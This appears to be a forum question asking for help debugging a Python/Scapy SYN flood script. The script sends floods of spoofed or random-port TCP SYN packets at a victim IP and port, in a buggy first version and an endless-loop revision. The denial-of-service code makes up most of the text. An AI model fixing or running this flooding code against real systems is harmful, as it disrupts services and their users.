I am writing code for synflood attack but when I run the file via python I get errors.
SYNFlood.py file:
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
target_ip = sys.argv[1] # the ip of the victim machine
target_port = sys.argv[2] # the port of the victim machine
print ("ip "+target_ip+" port "+target_port)
send(IP(src="192.168.x.x", dst="target_ip")/TCP(sport=135,dport=target_port), count=2000)
But when I am running the file with:
python SYNFlood.py target_ip target_port
I get the following error:
I have tried to alter the code as the following:
while (1==1):
p=IP(dst=target_ip,id=1111,ttl=99)/TCP(sport=RandShort(),dport=int(target_port) ,seq=12345,ack=1000,window=1000,flags="S")
send(p, count=10)
when I run on target pc the command netstat -A I dont see syn_recv packets.
I have tried with
send(p, verbose=0, count=10)
but I dont have any output neither on dst pc nor src pc with respective commands.